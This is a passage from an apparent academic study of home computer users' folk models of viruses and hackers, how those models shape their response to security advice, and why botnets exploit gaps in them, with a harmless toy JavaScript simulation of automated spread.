Note that by listing and describing these folk models, I do not intend to imply that these models are incorrect or bad. They are all certainly incomplete, and do not exactly correspond to the way malicious software or malicious computer users behave. But, as Kempton [19] learned in his study of home thermostats, what is important is not how accurate the model is but how well it serves the needs of the home computer user in making security decisions. Additionally, there is no “correct” model that can serve as a comparison. Even security experts will disagree as to the correct way to think about viruses or hackers. To show an extreme example, Medin et al. [22] conducted a study of expert fishermen in the Northwoods of Wisconsin. They looked at the mental models of both Native American fishermen and of majority-culture fishermen. Despite both groups being experts, the two groups showed dramatic differences in the way fish were categorized and classified. Majority-culture fishermen grouped fish into standard taxonomic and goal-oriented groupings, while Native American fishermen grouped fish mostly by ecological niche. This illustrates how even experts can have dramatically different mental models of the same phenomenon, and any single expert’s model is not necessarily correct. However, experts and novices do tend to have very different models; Asgharpour et al. [3] found strong differences between expert and novice computer users in their mental models of security.

Common Elements of Folk Models
Most respondents made a distinction between ‘viruses’ and ‘hackers.’ To them, these are two separate threats that can both cause problems. Some people believed that viruses are created by hackers, but they still usually saw them as distinct threats. A few respondents realized this and tried to describe the difference; for example, at one point in the interview, Irving tries to explain the distinction by saying “The hacker is an individual hacking, while the virus is a program infecting.” After some thought, he clarifies his idea of the difference a bit: “So it’s a difference between something automatic and more personal.” This description is characteristic of how many respondents think about the difference: viruses are usually more programmatic and automatic, whereas hacking is more like manual labor, requiring the hacker to be sitting in front of a computer entering commands. This distinction between hackers and viruses is not something that most of the respondents had thought about; it existed in their mental model but not at a conscious level. Upon prompting, Dana decides that “I guess if they hack into your system and get a virus on there, it’s gonna be the same thing.” She had never realized that they were distinct in her mind, but it makes sense to her that they might be related. She then goes on to ask the interviewer whether, if she got hacked, she could forward it on to other people. This also illustrates another common feature of these interviews. When exposed to new information, most of the respondents would extrapolate and try to apply that information to slightly different settings. When Dana was prompted to think about the relationship between viruses and hackers, she decided that they were more similar than she had previously realized. Then she began to apply ideas from one model (viruses spreading) to the other model (can hackers spread also?) by extrapolating from her current models. This is a common technique in human learning and sensemaking [25]. I suspect that many details of the mental models were formed in this way. Extrapolation is also useful for analysis; how respondents extrapolate from new information reveals details about mental models that are not consciously salient during interviews [8, 11]. During the interviews I used a number of prompts that were intended to challenge mental models and force users to extrapolate in order to help surface more elements of their mental models.

2.1 Models of Viruses and other Malware
All of the respondents had heard of computer viruses and possessed some mental model of their effects and transmission. The respondents focused their discussion primarily on the effects of viruses and the possible methods of transmission. In the second round of interviews, I prompted respondents to discuss how and why viruses are created by asking them to react to a number of hypothetical scenarios. These scenarios help me understand how the respondents apply these models to make security-relevant decisions. All of the respondents used the term ‘virus’ as a catch-all term for malicious software. Everyone seemed to recognize that viruses are computer programs. Almost all of the respondents classify many different types of malicious software under this term: computer viruses, worms, trojans, adware, spyware, and keyloggers were all mentioned as ‘viruses.’ The respondents don’t make the distinctions that most experts do; they just call any malicious computer program a ‘virus.’ Thanks to the term ‘virus,’ all of the respondents used some sort of medical terminology to describe the actions of malware. Getting malware on your computer means you have ‘caught’ the virus, and your computer is ‘infected.’ Everyone who had a Mac seemed to believe that Macs are ‘immune’ to virus and hacking problems (but were worried anyway).

Overall, I found four distinct folk models of ‘viruses.’ These models differed in a number of ways. One of the major differences is how well-specified and detailed the model was, and therefore how useful the model was for making security-related decisions. One model was very under-specified, labeling viruses as simply ‘bad.’ Respondents with this model had trouble using it to make any kind of security-related decisions because the model didn’t contain enough information to provide guidance. Two other models (the Mischief and Crime models) were fairly well-described, including how viruses are created and why, and what the major effects of viruses are. Respondents with these models could use them to extrapolate to many different situations and to make many security-related decisions on their computer. Table 1 summarizes the major differences between the four models.

{6} All respondents have been given pseudonyms for anonymity.

2.1.1 Viruses are Generically ‘Bad’
A few subjects had a very under-developed model of viruses. These subjects knew that viruses cause problems, but they couldn’t really describe the problems that viruses cause. They just knew that viruses were generically ‘bad’ to get and should be avoided. Respondents with this model knew of a number of different ways that viruses are transmitted. These transmission methods seemed to be things that the subjects had heard about somewhere, but the respondents did not attempt to understand them or organize them into a more coherent mental model. Zoe believed that viruses can come from strange emails, or from “searching random things” on the Internet. She says she had heard that blocking popups helps with viruses too, and seemed to believe that without questioning. Peggy had heard that viruses can come from “blinky ads like you’ve won a million bucks.” Respondents with this model are uniformly unconcerned with getting viruses: “I guess just my lack of really doing much on the Internet makes me feel like I’m safer” (Zoe). A couple of people with this model use Macintosh computers, which they believe to be “immune” to computer viruses. Since they believe they are immune, it seems that they have not bothered to form a more complete model of viruses. Since these users are not concerned with viruses, they do not take any precautions against being infected. These users believe that their current behavior doesn’t really make them vulnerable, so they don’t need to go to any extra effort. Only one respondent with this model uses an anti-virus program, but that is because it came installed on the computer. These respondents seem to recognize that anti-virus software might help, but are not concerned enough to purchase or install it.

2.1.2 Viruses are Buggy Software
One group of respondents saw computer viruses as an exceptionally bug-ridden form of regular computer software. In many ways, these respondents believe that viruses behave much like most of the other software that home users experience. But to be a virus, it has to be ‘bad’ in some additional way. Primarily, viruses are ‘bad’ in that they are poorly written software. They lead to a multitude of bugs and other errors in the computer. They bring out bugs in other pieces of software. They tend to have more bugs, and worse bugs, than most other pieces of software. But all of the effects they cause are the same types of effects you get from buggy software: viruses can cause computers to crash, or to “boot me out” (Erica) of applications that are running; viruses can accidentally delete or “wipe out” information (Christine and Erica); they can erase important system files. In general, the computer just “doesn’t function properly” (Erica) when it has a virus. Just like normal software, viruses must be intentionally placed on the computer and executed. Viruses do not just appear on a computer. Rather than ‘catching’ a virus, computers are actively infected, though often this infection is accidental. Some viruses come in the form of email attachments. But they are not a threat unless you actually “click” on the attachment to run it. If you are careful about what you click on, then you won’t get the virus. Another example is that viruses can be downloaded from websites, much like many other applications. Erica believes that sometimes downloading games can end up causing you to download a virus. But still, intentional downloading and execution is necessary to be infected with a virus, much the same way that intentional downloading and execution is necessary to run programs from the Internet. Respondents with this model did not feel that they needed to exert a lot of effort to protect themselves from viruses. Mostly, these users tried not to download and execute programs that they didn’t trust. Sarah intentionally “limits herself” by not downloading any programs from the Internet so she doesn’t get a virus. Since viruses must be actively executed, anti-virus programs are not important. As long as no one downloads and runs programs from the Internet, no virus can get onto the computer. Therefore, anti-virus programs that detect and fix viruses aren’t needed. However, two respondents with this model run anti-virus software just in case a virus is accidentally put on the computer. Overall, this is a somewhat underdeveloped mental model of viruses. Respondents who possessed this model had never really thought about how viruses are created, or why. When asked, they talk about how they haven’t thought about it, and then make guesses about how ‘bad people’ might be the ones who create them. These respondents haven’t put much thought into their mental model of viruses; all of the effects they discuss are either effects they have seen or more extreme versions of bugs they have seen in other software. Christine says “I guess I would know [if I had a virus], wouldn’t I?”, presuming that any effects the virus has would be evident in the behavior of the computer. No connection is made between hackers and viruses; they are distinct and separate entities in the respondent’s mind.

2.1.3 Viruses Cause Mischief
A good number of respondents believed that viruses are pieces of software that are intentionally annoying. Someone created the virus for the purpose of annoying computer users and causing mischief. Viruses sometimes have effects that are much like extreme versions of annoying bugs: crashing your computer, deleting important files so your computer won’t boot, etc. Often the effects of viruses are intentionally annoying, such as displaying a skull and crossbones upon boot (Bob), displaying advertising popups (Floyd), or downloading lots of pornography (Dana). While these respondents believe that viruses are created to be annoying, they rarely have a well-developed idea of who created them. They don’t naturally mention a creator for the viruses, just a reason why they are created. When pushed, these respondents will talk about how they are probably created by “hackers” who fit the Graffiti hacker model below. But the identity of the creator doesn’t play much of a role in making security decisions with this model. Respondents with this model always believe that viruses can be “caught” by actively clicking on them and executing them. However, most respondents with this model also believe that viruses can be “caught” by simply visiting the wrong webpages. Infection here is very passive and can come just from visiting the webpage. These webpages are often considered to be part of the ‘bad’ part of the Internet. Much like graffiti appears in the ‘bad’ parts of cities, mischievous viruses are most prevalent on the bad parts of the Internet. While most everyone believes that care in clicking on attachments or downloads is important, these respondents also try to be careful about where they go on the Internet. One respondent (Floyd) tries to explain why: websites automatically put cookies on your computer, so viruses being automatically put on your computer could be related to that. These ‘bad’ parts of the Internet where you can easily contract viruses are frequently described as morally ambiguous webpages. Pornography is always considered shady, but some respondents also included entertainment websites where you can play games, and websites that have been on the news like “MySpaceBook” (Gina). Some respondents believed that a “secured” website would not lead to a virus, but Gail acknowledged that at some sites “maybe the protection wasn’t working at those sites and they went bad.” (Note the passive phrasing; again, she has not thought about how sites go bad or who causes them to go bad. She is just concerned with the outcome.)

2.1.4 Viruses Support Crime
Finally, some respondents believe that viruses are created to support criminal activities. Almost uniformly, these respondents believe that identity theft is the end goal of the criminals who create these viruses, and the viruses assist them by stealing personal and financial information from individual computers. For example, respondents with this model worry that viruses are looking for credit card numbers, bank account information, or other financial information stored on their computer. Since the main purpose of these viruses is to collect information, the respondents who have this model believe that viruses often remain undetected on computers. These viruses do not explicitly cause harm to the computer, and they do not cause bugs, crashes, or other problems. All they do is send information to criminals. Therefore, it is important to run an anti-virus program on a regular basis because it is possible to have a virus on your computer without knowing it. Since viruses don’t harm your computer, backups are not necessary. People with this model believed that there are many different ways for these viruses to spread. Some viruses spread through downloads and attachments. Other viruses can spread “automatically,” without requiring any actions by the user of the computer. Also, some people believe that hackers will install this type of virus onto the computer when they break in. Given this wide variety of transmission methods and the serious nature of identity theft, respondents with this model took many steps to try to stop these viruses. These users would work to keep their anti-virus up to date, purchasing new versions on a regular basis. Often, they would notice when the anti-virus would conduct a scan of their computer and check the results. Valerie would even turn her computer off when it is not in use to avoid potential problems with viruses.

2.1.5 Multiple Types of Viruses
A couple of respondents discussed multiple types of viruses on the Internet. These respondents believed that some viruses are mischievous and cause annoying problems, while other viruses support crime and are difficult to detect. All respondents who talked about more than one type of virus drew on both of the previous two virus folk models: the mischievous viruses and the criminal viruses. One respondent, Jack, also talked about a third type of virus that was created by anti-virus companies, but he seemed to regard this as a conspiracy theory and consequently didn’t take the suggestion very seriously. Respondents with multiple models generally would take all of the precautions that either model would predict. For example, they would make regular backups in case they caught a mischievous virus that damaged their computer, but they would also regularly run their anti-virus program to detect the criminal viruses that don’t have noticeable effects. This fact suggests that information sharing between users may be beneficial; when users believe in multiple types of viruses, they take appropriate steps to protect against all types.

2.2 Models of Hackers and Break-ins
The second major category of folk models describes the attackers: the people who cause Internet security problems. These attackers are always given the name “hackers,” and all of the respondents seemed to have some concept of who these people were and what they did. The term “hacker” was applied to anyone who does bad things on the Internet, no matter who they are or how they work. All of the respondents describe the main threat that hackers pose as “breaking in” to their computer. They would disagree as to why a hacker would want to “break in” to a computer, and which computers hackers would target for their break-ins, but everyone agreed on the terminology for this basic action. To the respondents, breaking in to a computer meant that the hacker could then use the computer as if they were sitting in front of it, and could cause a number of different things to happen to the computer. Many respondents stated that they did not understand how this worked, but they still believed it was possible. My respondents described four distinct folk models of hackers. These models differed mainly in who they believed these hackers were, what they believed motivated these people, and how they chose which computers to break in to. Table 2 summarizes the four folk models of hackers.



2.2.1 Hackers are Digital Graffiti Artists
One group of respondents believe that hackers are technically skilled people causing mischief. There is a collection of individuals, usually called “hackers,” who use computers to cause a technological version of mischief. Often these users are envisioned as “college-age computer types” (Kenneth). They see hacking computers as a sort of digital graffiti; hackers break in to computers and intentionally cause problems so they can show off to their friends. Victim computers are a canvas for their art.

When respondents with this model talked about hackers, they usually focused on two features: strong technical skills and the lack of proper moral restraint. Strong technical skills provide the motivation; hackers do it “for sheer sport” (Lorna) or to demonstrate technical prowess (Hayley). Some respondents envision a competition between hackers, where more sophisticated viruses or hacks “prove you’re a better hacker” (Kenneth); others see creating viruses and hacking as part of “learning about the Internet” (Jack). Lack of moral restraint is what makes them different from others with technical skills; hackers are sometimes described as maladjusted individuals who “want to hurt others for no reason” (Dana). Respondents will describe hackers as “miserable” people. They feel that hackers do what they do for no good reason, or at least no reason they can understand. Hackers are believed to be lone individuals; while they may have hacker friends, they are not part of any organization.

Users with this model often focus on the identity of the hacker. This identity, a young computer geek with poor morals, is much more developed in their mind than the resulting behavior of the hacker. As such, people with this model can usually talk clearly and give examples of who hackers are, but seem less confident in information about the resulting break-ins that happen. These hackers like to break stuff on the computer to create havoc. They will intentionally upload viruses to computers to cause mayhem. Many subjects believe that hackers intentionally cause computers harm; for example, Dana believes that hackers will “fry your hard drive.” Hackers might install software to let them control your computer; Jack talked about how a hacker would use his instant messenger to send strange messages to his friends.

These mischievous hackers were seen as not targeting specific individuals, but rather choosing random strangers to target. This is much like graffiti; the hackers need a canvas and choose whatever computer they happen to come upon. Because of this, the respondents felt like they might become a victim of this type of hacking at any time. Often, these respondents felt there wasn’t much they could do to protect themselves from this type of hacking: because they didn’t understand how hackers were able to break into computers, they didn’t know what could be done to stop it. This would lead to a feeling of futility: “if they are going to get in, they’re going to get in.” (Hayley) This feeling of futility echoes similar statements discussed by Dourish et al. [12].

2.2.2 Hackers are Burglars Who Break Into Computers for Criminal Purposes
Another set of respondents believe that hackers are criminals who happen to use computers to commit their crimes. Other than the use of the computer, they share a lot in common with other professional criminals: they are motivated by financial gain, and they can do what they do because they lack common morals. They “break into” computers to look for information much like a burglar will break into houses to look for valuables. The most salient part of this folk model is the behavior of the hacker; the respondents could talk in detail about what the hackers were looking for, but spoke very little about the identity of the hacker.

Almost exclusively, this criminal activity is some form of identity theft. Respondents believe that if a hacker obtains their credit card number, for example, then that hacker can make fraudulent charges with it. But the respondents weren’t always sure what kind of information the hacker was specifically looking for; they just described it as information the hacker could use to make money. Ivan talked about how hackers would look around the computer much like a thief might rummage around in an attic, looking for something useful. Erica used a different metaphor, saying that hackers would “take a digital photo of everything on my computer” and look in it for useful identity information. Usually, the respondents envision the hacker himself using this financial information (as opposed to selling the information to others). Since hackers target information, the respondents believe that computers are not harmed by the break-ins. Hackers look for information, but do not harm the computer. They simply rummage around, “take a digital photo,” possibly install monitoring software, and leave. The computer continues to work as it did before. The main concern of the respondents is how the hacker might use the information that they steal.

These hackers choose victims opportunistically; much like a mugger chooses his victims, these hackers will break into any computers they run across to look for valuable information. Or, more accurately, the respondents don’t have a good model of how hackers choose, and believe that there is a decent chance that they will be a victim someday. Gail talks about how hackers are opportunistic, saying “next time I go to their site they’ll nab me.” Hayley believes that they just choose computers to attack without knowing much about who owns them. Respondents with this belief are willing to take steps to protect themselves from hackers to avoid becoming a victim. Gail tries to avoid going to websites she’s not familiar with to prevent hackers from discovering her. Jack is careful to always sign out of accounts and websites when he is finished. Hayley shuts off her computer when she isn’t using it so hackers cannot break into it.

2.2.3 Hackers are Criminals who Target Big Fish
Another group of respondents had a conceptually similar model. This group also believes that hackers are Internet criminals who are looking for information to conduct identity theft. However, this group has thought more about how these hackers can best accomplish this goal, and has come to some different conclusions. These respondents believe in “massive hacker groups” (Hayley) and other forms of organization and coordination among criminal hackers. Most tellingly, this group believes that hackers only target the “big fish”: hackers primarily break into computers of important and rich people in order to maximize their gains. Every respondent who holds this model believes that he or she is not likely to be a victim because he or she is not a big enough fish. They believe that hackers are unlikely to ever target them, and that they are therefore safe from hacking. Irving put it this way: “I’m small potatoes and no one is going to bother me.” They often talk about how other people are more likely targets: “Maybe if I had a lot of money” (Floyd) or “like if I were a bank executive” (Erica). For these respondents, protecting against hackers isn’t a high priority. Mostly they find reasons to trust existing security precautions rather than taking extra steps to protect themselves. For example, Irving talked about how he trusts his pre-installed firewall program to protect him. Both Irving and Floyd trust their passwords to protect them. Basically, their actions indicate that they believe in the speed bump theory: by making things slightly harder for hackers with standard security technologies, they ensure that hackers will decide it isn’t worthwhile to target them.

2.2.4 Hackers are Contractors Who Support Criminals
Finally, there is a sort of hybrid model of hackers. In this view, the hackers themselves are very similar to the mischievous graffiti-hackers from above: they are college-age, technically skilled individuals. However, their motivations are more intentional and criminal: these hackers are out to steal personal and financial information from people. Users with this model show evidence of more effort in thinking through their mental model and integrating the various sources of information they have. This model can be seen as a hybrid of the mischievous graffiti-hacker model and the criminal hacker model, integrated into a coherent form by combining the most salient part of the mischievous model (the identity of the hacker) and the most salient part of the criminal model (the criminal activities). Also, everyone who had this model expressed some puzzlement about how hacking works. Kenneth stated that he doesn’t understand how someone can break into a computer without sitting in front of it. Lorna wondered how you can start a program running; she feels you have to be in front of the computer to do that. This indicates that these respondents are actively trying to integrate the information they have about hackers into a coherent model of hacker behavior. Since these hackers are first and foremost young technical people, the respondents believe that these hackers are not likely to be identity thieves themselves; the hackers are more likely to sell this identity information for others to use. Since the hackers just want to sell information, the respondents reason, they are more likely to target large databases of identity information such as banks or retailers like Amazon.com. Respondents with this model believed that hackers weren’t really their problem. Since these hackers tended to target larger institutions like banks or e-commerce websites, their own personal computers weren’t in danger. Therefore, no effort was needed to secure their personal computers. However, all respondents with this model expressed a strong concern about whom they do business with online. These respondents would only make purchases or provide personal information to institutions they trusted to get security right and to protect their data against hackers. These users were highly sensitive to third parties possessing their data.

2.2.5 Multiple Types of Hackers
Some respondents believed that there were multiple types of hackers. Most of the time, these respondents would believe that some hackers are the mischievous graffiti-hackers and that other hackers are criminal hackers (using either the burglar or big fish model, but not both). These respondents would then try to protect themselves from both types of hacker threats as necessary. It seems that there is some amount of cognitive dissonance that occurs when respondents hear about both mischievous hackers and criminal hackers. There are two ways that respondents resolve this. The simplest is to believe that some hackers are mischievous and other hackers are criminals, and consequently to keep the models separate. A more complicated way is to try to integrate the two models into one coherent belief about hackers; this latter option involves a lot of effort to make sense of a new folk model that is not as clear or as commonly shared as the mischievous and criminal models. The ‘contractor’ model of hackers is the result of this integration of the two types of hackers.

3. FOLLOWING SECURITY ADVICE
Computer security experts have been providing security advice to home computer users for many years now. There are many websites devoted to doling out security advice, and numerous technical support forums where home computer users can ask security-related questions. There has been much effort to simplify security advice so regular computer users can easily understand and follow it. However, many home computer users still do not follow this advice, as is evident from the large number of security problems that plague home computers. There is disagreement among security experts as to why this advice isn’t followed. Some experts seem to believe that home users do not understand the security advice, and therefore more education is needed. Others seem to believe that home users are simply incapable of consistently making good security decisions [10]. However, neither of these explanations accounts for which advice does get followed and which advice does not. The folk models described above begin to provide an explanation of which expert advice home computer users choose to follow, and which advice they ignore. By better understanding why people choose to ignore certain pieces of advice, we can better craft that advice and the associated technologies to have a greater effect.

In Table 3, I list 12 common pieces of security advice for home computer users. This advice was collected from the Microsoft Security at Home website {7}, the CERT Home Computer Security website {8}, and the US-CERT Cyber-Security Tips website {9}; much of this advice is duplicated across websites. This advice represents the distilled wisdom of many computer security experts. The table then summarizes, for each folk model, whether that advice is important to follow, helpful but not essential, or not necessary to follow. To me, the most interesting entries indicate when users believe that a piece of security advice is not necessary to follow (labeled ‘xx’ in the table). These entries show how home computer users apply their folk models to determine for themselves whether a given piece of advice is important. Also interesting are the entries labeled ‘??’; these indicate places where users believe that the advice will help with security, but do not see it as so important that it must always be followed. Often users will decide that following advice labeled with ‘??’ is too costly in terms of effort or money, and decide to ignore it. Advice labeled ‘!!’ is extremely important, and the respondents feel that it should never be ignored, even if following it is inconvenient, costly, or difficult.

{7} http://www.microsoft.com/protect/default.mspx, retrieved July 5, 2009
{8} http://www.cert.org/homeusers/HomeComputerSecurity/, retrieved July 5, 2009
{9} http://www.us-cert.gov/cas/tips/, retrieved July 5, 2009

3.1 Anti-Virus Use
Advice 1–3 has to do with anti-virus technology: Advice #1 states that anti-virus software should be used; #2 states that the virus signatures need to be constantly updated to be able to detect current viruses; and #3 states that the anti-virus software should regularly scan a computer to detect viruses. All of these are best practices for using anti-virus software. Respondents mostly use their folk models of viruses to make decisions about anti-virus use, for obvious reasons. Respondents who believe that viruses are just buggy software also believe it is not necessary to run anti-virus software. They think they can keep viruses off of their computer by controlling what gets installed on it; they believe viruses need to be executed manually to infect a computer, and if they never execute one then they don’t need anti-virus software. Respondents with the under-developed folk model of viruses, who refer to viruses as generically ‘bad,’ also do not use anti-virus software. These people understand that viruses are harmful and that anti-virus software can stop them. However, they have never really thought about the specific harms a virus might cause them. Lacking an understanding of the threats and potential harm, they generally find it unnecessary to exert the effort to follow the best practices around anti-virus software. Finally, one group of respondents believe that anti-virus software can help stop hackers. Users with the burglar model of hackers believe that regular anti-virus scans can be important because these burglar-hackers will sometimes install viruses to collect personal information. Regular anti-virus use can help detect these hackers.

3.2 Other Security Software
Advice #4 concerns other types of security software: home computer users should run a firewall or a more comprehensive Internet security suite. I think that most of the respondents didn’t understand what this security software did, other than having a general notion of it providing “security.” As such, no one included security software as an important component of their mental model. Respondents who held the graffiti-hacker or burglar-hacker models believed that this software must help with hackers somehow, even though they don’t know how, and would suggest installing it. But since they do not understand how it works, they do not consider it of vital importance. This highlights an opportunity for home user education: if these respondents better understood how security software helps protect against hackers, they might be more interested in using and maintaining it. One interesting belief about this software comes from the respondents who believe hackers only go after big fish. For these respondents, security software can serve as a speed bump that discourages hackers from casually breaking into their computer; they don’t care exactly how it works as long as it does something.

3.3 Email Security
Advice #5 is the only piece of advice about email on my list. It states that you shouldn’t open attachments from people you don’t recognize. Everyone in my sample was familiar with this advice and had taken it to heart. Everyone believed that viruses can be transmitted through email attachments, and therefore not clicking on unknown attachments can help prevent viruses.

3.4 Web Browsing
Advice 6-9 all deals with security behaviors while browsing the web. Advice #6 states that users need to ensure that they only download and run programs from trustworthy sources; many types of malware are spread through downloads. #7 states that users should only browse web pages from trustworthy sources; there are many types of malicious websites, such as phishing websites, and some websites can spread malware when a visitor simply loads the site and executes the JavaScript on it. #8 states that users should disable scripting like Java and JavaScript in their web browsers; there are often vulnerabilities in these scripting technologies, and some malware uses these vulnerabilities to spread. And #9 suggests using good passwords so attackers cannot guess their way into your accounts.

Overall, many respondents would agree with most of this advice. However, no one seemed to understand the advice about web scripts; indeed, no one seemed to even understand what a web script was. Advice #8 was largely ignored because it wasn’t understood. Everyone understood the need for care in choosing what to download; downloads were strongly associated with viruses in most respondents’ minds. However, only users with well-developed models of viruses (the Mischief and Support Crime models) believed that viruses can be “caught” simply by browsing web pages. People who believed that viruses were buggy software didn’t see browsing as dangerous because they weren’t actively clicking on anything to run it. While all of the respondents expressed some knowledge of the importance of passwords, few exerted extra effort to make good passwords. Everyone understood that, in general, passwords are important, but they couldn’t explain why. Respondents with the graffiti hacker model would sometimes put extra effort into their passwords so that mischievous hackers couldn’t mess up their accounts. And respondents who believed that hackers only target big fish thought that passwords could be an effective speed bump to prevent hackers from casually targeting them. Respondents who believed in hackers as contractors to criminals uniformly believed that they were not targets of hackers and were therefore safe. However, they were careful in choosing which websites to do business with; since these hackers target web businesses with lots of personal or financial information, they felt it important to only do business with websites that are trusted to be secure.

3.5 Computer Maintenance
Finally, Advice 10-12 concerns computer maintenance. Advice #10 suggests that users make regular backups in case some of their data is lost or corrupted; this is good advice for both security and non-security reasons. #11 states that it is important to keep the system patched with the latest updates to protect against known vulnerabilities that hackers and viruses can exploit. And #12 echoes the old maxim that the most secure machine is one that is turned off. Different models led to dramatically different conclusions as to which types of maintenance are important. For example, mischievous viruses and graffiti hackers can cause data loss, so users with those models feel that backups are very important. But users who believe in the more criminal viruses and hackers don’t feel that backups are necessary; those hackers and viruses steal information but don’t delete it. Patching is an important piece of advice, since hackers and viruses need vulnerabilities to exploit. Most respondents only experience patches through the automatic updates feature in their operating system or applications. Respondents mostly associated the patching advice with hackers; respondents who felt that they would be a target of hackers also felt that patching was an important tool to stop hackers. Respondents who believe that viruses are buggy software feel that viruses also bring out more bugs in other software on the computer; patching the other software makes it more difficult for viruses to cause problems.

4. BOTNETS and the FOLK MODELS
This study was inspired by the recent rise of botnets as a strategy for malicious attackers. Understanding the folk models that home computer users employ in making security decisions sheds light on why botnets are so successful. Modern botnet software seems designed to take advantage of gaps and security weaknesses in multiple folk models. I begin by listing a number of stylized facts about botnets. These facts are not true of all botnets and botnet software, but they are true of many of the recent and large botnets.

1. Botnets attack third parties. When botnet viruses compromise a machine, that machine only serves as a worker. That machine is not the end goal of the attacker. The owner of the botnet intends to use that machine (and many others) to cause problems for third parties.
2. Botnets only want the Internet connection. The only thing the botnet wants on the victim computer is the Internet connection. Botnet software rarely takes up much space on the hard drive, rarely looks at existing data on the hard drive, rarely occupies much memory, and usually doesn’t use much CPU. Nothing that makes the computer unique is important.
3. Botnets don’t directly harm the host computer. Most botnet software, once installed, does not directly cause harm to the machine it is running on. It consumes resources, but often botnet software is configured to only use the resources at times they are otherwise unused (like running in the middle of the night). Some botnets even install patches and software updates so that other botnets cannot also use the computer.
4. Botnets spread automatically through vulnerabilities. Botnets often spread through automated compromises. They automatically scan the internet, compromise any vulnerable computers, and install copies of the botnet software on the compromised computers. No human intervention is required; neither the attacker nor the zombie owner nor the vulnerable computer’s owner needs to be sitting at their computer at the time.
These stylized facts about botnets are not true for all botnets, but they hold for many of the current, large, well-known, and well-studied botnets. I believe that botnet software effectively takes advantage of the limited and incomplete nature of the folk models of home computer users. Table 4 illustrates how each model does or does not incorporate the possibility of each of the stylized facts about botnets.
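To make the fourth fact concrete, here is a minimal sketch (in JavaScript, runnable under any modern JS engine) of how fully automated spread plays out on a toy network. Every number and name in it is an invented assumption for illustration; it is an epidemic-style simulation, not any real botnet's code.

    // Toy simulation of stylized fact 4: automated spread, no human action.
    // All names and numbers are illustrative assumptions.
    const HOSTS = 1000;            // a tiny pretend Internet
    const VULNERABLE_RATE = 0.1;   // assumed fraction of unpatched machines
    const SCANS_PER_TICK = 5;      // addresses each zombie probes per step

    // Each host is 'patched', 'vulnerable', or 'zombie'.
    const net = Array.from({ length: HOSTS }, () =>
      Math.random() < VULNERABLE_RATE ? 'vulnerable' : 'patched');
    net[0] = 'zombie'; // a single initial infection

    for (let tick = 0; tick < 50; tick++) {
      for (let i = 0; i < HOSTS; i++) {
        if (net[i] !== 'zombie') continue;
        // The zombie scans random addresses; any vulnerable host it finds
        // is compromised immediately. No user sits at either machine.
        for (let s = 0; s < SCANS_PER_TICK; s++) {
          const target = Math.floor(Math.random() * HOSTS);
          if (net[target] === 'vulnerable') net[target] = 'zombie';
        }
      }
      const zombies = net.filter(state => state === 'zombie').length;
      console.log('tick ' + tick + ': ' + zombies + ' zombies');
    }

Even with these small invented numbers, the zombie count typically saturates within a few dozen ticks, and no "user" ever acts anywhere in the loop; that is exactly the property the respondents' folk models fail to capture.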

Botnets attack third parties.
None of the hacker models would predict that compromises would be used to attack third parties. Respondents who held the Big Fish or the Contractor mental model believe that, since hackers don’t want anything on their computer, the hackers would target other computers and leave their computer alone. Respondents with the Burglar model believe that they might be a target, but only because the hacker wants something that might be on their computer. They would believe that once the hacker either finds what they were looking for, or cannot find anything interesting, the hacker would leave. Respondents with the Graffiti model believe that hacking and vandalizing the computer is the end goal; it would never cross their mind that the compromised computer could then be used to attack third parties. None of the respondents used their virus models to discuss potential third parties either. A couple of respondents with the Viruses are Bad model mentioned that once they got a virus, it might try to “spread.” However, they had no idea how this spreading might happen. Spreading is a form of harm to third parties, but it is not the coordinated and intentional harm that botnets cause. Respondents who employed the other three virus models never mentioned the possibility of spreading beyond their computers. They were mostly focused on what the virus would do to them, not on how it might affect others. Also, for those who had an idea of how viruses spread, those ideas only involved spreading through webpages and email. They don’t run a webpage on their computer, and no one acknowledged that a virus could use their email to send copies out.

Botnets only want the Internet connection.
No one in this study could conceive of a hacker or virus that only wanted the Internet connection of their computer. The three crime-based hacker models (Burglar, Big Fish, and Contractor) all hold that hackers are actively looking for something stored on the computer. All the respondents with these three models believed that their computer had (or might have) some specific and unique information that hackers wanted. Respondents with the Graffiti model believed that computers are a sort of canvas for digital mischief. I would guess that they might accept that botnet owners would only want the Internet connection; they believe there is nothing unique about their computer that makes hackers want to paint digital graffiti on it. None of the virus models would have anything to say about this fact. Respondents with the Viruses are Bad model and the Buggy Software model didn’t attribute any intentionality to viruses. Respondents with the Mischief and Support Crime models believed viruses were created for a reason, but didn’t seem to think about how a virus might use the computer’s Internet connection to spread.

Botnets don’t harm the host computer.
This is the one stylized fact on this list that any of the respondents explicitly mentioned. Respondents with the Support Crime model believe that viruses might try to hide on the computer and not display any outward signs of their presence. Respondents who employ one of the other three virus models would find this strange; to them, viruses always create visible effects. To users with the Mischief model, these visible effects are the main point of the virus! Additionally, the three folk models of hackers that relate to crime all include the idea that a ‘break in’ by hackers might not harm the computer. To these respondents, since hackers are just looking for information, they don’t necessarily want to harm the computer. Respondents who use the Graffiti model would find compromises that don’t harm the computer strange, as to them the main purpose of ‘breaking into’ computers is to vandalize them.

Botnets spread automatically.
The idea that botnets spread without human intervention would be strange to most of the respondents. Almost all of the respondents believed that hackers had to be sitting in front of some computer somewhere when they were “breaking into” computers. Indeed, two of the respondents even asked the interviewer how it was possible to use a computer without being in front of it. Most respondents believed that viruses also generally required some form of human intervention in order to spread. Viruses could be ‘caught’ by visiting webpages, by downloading software, or by clicking on emails, but all of those require someone to be actively using the computer. Only one subject explicitly mentioned that viruses can “just happen” (Jack). Respondents with the Viruses are Bad model understood that viruses could spread, but didn’t know how. These respondents might not be surprised to learn that viruses can spread without human intervention, but probably haven’t thought about it enough for that fact to be salient.

Summary
Botnets are extremely cleverly designed. They take advantage of home computer users by operating in a very different manner from the one conceived of by the respondents in this study. The only stylized fact listed above that a decent number of my respondents would recognize as a property of attacks is that botnets don’t cause harm to the host computer. And not everyone in the study would believe this; some respondents had a mental model in which not harming the computer wouldn’t make sense. This analysis illustrates why eliminating botnets is so difficult. Many home computer users probably have folk models similar to the ones possessed by the respondents in this study. If so, botnets look very different from the threats envisioned by many home computer users. Since home computer users do not see botnets as a potential threat, they do not take appropriate steps to protect themselves.

5. LIMITATIONS and MOVING FORWARD
